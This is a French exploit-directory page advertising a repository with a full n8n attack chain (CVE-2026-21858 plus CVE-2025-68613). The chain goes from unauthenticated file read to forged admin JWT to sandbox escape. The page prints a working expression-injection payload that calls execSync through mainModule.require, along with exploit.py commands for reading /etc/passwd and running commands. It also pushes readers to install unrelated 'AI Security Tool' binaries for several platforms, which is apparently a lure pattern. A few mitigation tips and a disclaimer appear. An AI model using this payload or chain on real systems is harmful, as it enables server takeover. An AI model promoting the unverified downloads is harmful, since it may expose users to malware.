Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ Module officiel d'outil de sécurité IA pour CVE-2026-21858 + CVE-2025-68613 (chaîne complète RCE par lecture arbitraire de fichiers non authentifiée et injection d'expressions « Ni8mare » de n8n). | Kitploit
Outils/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationSécurité WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
Sécurité de l'IA
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ Module officiel d'outil de sécurité IA pour CVE-2026-21858 + CVE-2025-68613 (chaîne complète RCE par lecture arbitraire de fichiers non authentifiée et injection d'expressions « Ni8mare » de n8n).

Voir le dépôt
il y a 14h 16mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ Module d'outil de sécurité IA
Chaîne complète n8n (CVE-2026-21858 + CVE-2025-68613) — « Ni8mare »

Module d'audit de sécurité officiel pour l'écosystème AI Security Tool


Latest Release Build Status Donations Telegram Channel

License

🌐 Démo Web • 📚 Site du projet • 💬 Chat communautaire

Navigation du site : Accueil • Mises à jour • Téléchargements • Modules

AI Security Tool Banner


🧠 Aperçu conceptuel

Ce module fournit des outils de diagnostic et une chaîne d'exploitation complète pour les instances d'automatisation de workflows n8n, baptisée Ni8mare.

La chaîne d'attaque combine une lecture arbitraire de fichiers non authentifiée (CVE-2026-21858) causée par une confusion de Content-Type avec un contournement du bac à sable par injection d'expression authentifiée (CVE-2025-68613). En envoyant une requête Content-Type: application/json manipulée vers un formulaire de téléversement de fichiers exposé, un attaquant contrôle l'argument filepath pour lire des fichiers système internes (/proc/self/environ, la configuration et la base SQLite). L'encryptionKey et le hash de mot de passe récupérés permettent la falsification hors ligne d'un cookie JWT administrateur. Une fois authentifié, l'injection d'expression via this.process.mainModule.require permet de s'échapper du bac à sable JavaScript pour exécuter des commandes système arbitraires.

🎯 Philosophie d'impact principal

« De la lecture de fichier à la prise de contrôle totale du système en trois étapes. »
Alors que la lecture de fichier nécessite un workflow de formulaire actif avec sortie binaire, l'injection d'expression fonctionne de manière fiable sur les installations n8n par défaut, sans nécessiter de nœuds spéciaux ni l'activation explicite de permissions système.

📊 Spécifications de la vulnérabilité

SpécificationValeur attribuéeNotes
Identifiants CVECVE-2026-21858 + CVE-2025-68613Chaîne complète : lecture de fichier non authentifiée vers RCE
Niveau de gravitéCritique (CVSS v3.1 : 10.0 + 9.9)Chaîne RCE non authentifiée
Types de vulnérabilitéCWE-200 / CWE-94Confusion de Content-Type / Injection de code
Composant affectéMoteur d'automatisation de workflows n8nVersions <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
Versions corrigées1.121.0 (AFR) / 1.120.4+ (RCE)Correctifs officiels de l'éditeur publiés
Privilèges requisAucunAccès initial non authentifié via un formulaire public

🕸 Scénario d'attaque et architecture

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 Charge utile d'injection d'expression

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 Liste de contrôle des mesures d'atténuation

  • 🟢 Mettre à jour immédiatement : Mettez à jour les instances n8n vers la version 1.121.0 ou supérieure.
  • 🟢 Restreindre les déclencheurs de workflow : Désactivez les workflows de formulaire publics non authentifiés ou imposez une validation stricte des fichiers.
  • 🟡 Configurer les restrictions d'exécution : Définissez N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true et restreignez les capacités du processus dans les conteneurs Docker.

💻 Comment exécuter ce module

⚠️ IMPORTANT : Ce module est conçu spécifiquement pour une exécution sûre et des diagnostics au sein de l'écosystème AI Security Tool. Utilisez toujours des modules vérifiés provenant de dépôts officiels.

1️⃣ Installer AI Security Tool

Pour exécuter les scripts de surveillance et de diagnostic, assurez-vous que le moteur principal d'AI Security Tool est installé :

OS / PlateformeVersionArchitecture / FormatDate de publicationStatutLien de téléchargement
🪟 Windowsv6.3.20Installateur x64 (.exe)2026-09-08🟢 DernièreTélécharger .exe
🪟 Windowsv6.3.20Portable x64 (.tar.gz)2026-09-08🟢 DernièreTélécharger .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 StableTélécharger .dmg
🐧 Linuxv5.3.27Universel x64 (.tar.gz)2026-09-01🟢 StableTélécharger .tar.gz
🤖 Androidv8a 5.3.27APK ARM64 (.apk)2026-09-01🟢 StableTélécharger .apk

2️⃣ Exécution en console

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 Modules d'audit de sécurité et dépôts PoC

Modules de scan de vulnérabilités, scripts PoC et dépôts de recherche maintenus par notre communauté :

🔥 Exécution de code à distance (RCE) et vulnérabilités réseau 5 modules
  • CVE-2026-21858 — Chaîne complète n8n RCE non authentifiée (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Exploit d'exécution de code à distance Netlogon @ZeroDayEvil
  • CVE-2026-20805 — Preuve de concept d'exécution de code à distance Windows @ZeroDayEvil
  • CVE-2026-41096 — Module de scan de vulnérabilité RCE critique @ZeroDayEvil
  • CVE-2026-24291 — Exécution de code à distance via protocole réseau @ZeroDayVPN
🛡️ Élévation de privilèges (EoP) et services 3 modules
  • CVE-2026-54121 — Usurpation de contrôleur de domaine AD CS Certighost @ZeroDayEvil
  • CVE-2026-66804 — Élévation de privilèges du service CrossDevice @ZeroDayVPN
  • CVE-2026-50416 — Analyse et PoC d'élévation de privilèges locale @ZeroDayEvil
📚 Recherche sur les vulnérabilités et analyses 2 modules
  • CVE-2026-42978 — Analyse technique approfondie et recherche PoC @ZeroDayEvil
  • CVE-2026-83991 — Analyse complète et démonstration d'exploitation @ZeroDayVPN

⚖️ Licence et avertissement juridique

🚨 Avertissement

Cet outil et cette analyse technique sont fournis strictement à des fins d'audit système autorisé, de recherche et de tests d'intrusion.
L'exécution de chaînes d'exploitation contre des cibles non autorisées est illégale. Les auteurs n'assument aucune responsabilité en cas d'accès non autorisé, de perte de données ou de perturbation du système. Opérez strictement dans un périmètre autorisé.

🔄 Contribution et communauté

Nous accueillons favorablement les contributions de la communauté de recherche en sécurité ! Principaux domaines de contribution :

  1. Intégrations IA : Ajout de nouveaux fournisseurs LLM et développement d'agents de sécurité spécialisés.
  2. Outils de sécurité : Développement de modules de vulnérabilité et intégration de scanners CLI.
  3. Optimisation : Amélioration de la vitesse du parseur, de la sécurité d'exécution et de la logique de mise en cache.
  4. Documentation : Rédaction d'articles de recherche, de guides et de traductions localisées.

🔗 Contact et support

  • Site officiel : ZeroDayEvil.com
  • Recherche originale : Analyse Cyera Ni8mare
  • Administrateur Telegram : @ZeroDayEvil
  • Chat Telegram : @ZeroDyaTool_chat
  • Canal Telegram : @ZeroDyaTool_channel
  • Sponsoriser le projet : Dons PayPal
  • Open Collective : opencollective.com/ZeroDayEvil

AI Security Tool — Réinventer le workflow terminal et l'automatisation pour les professionnels de la cybersécurité.

Télécharger l’outil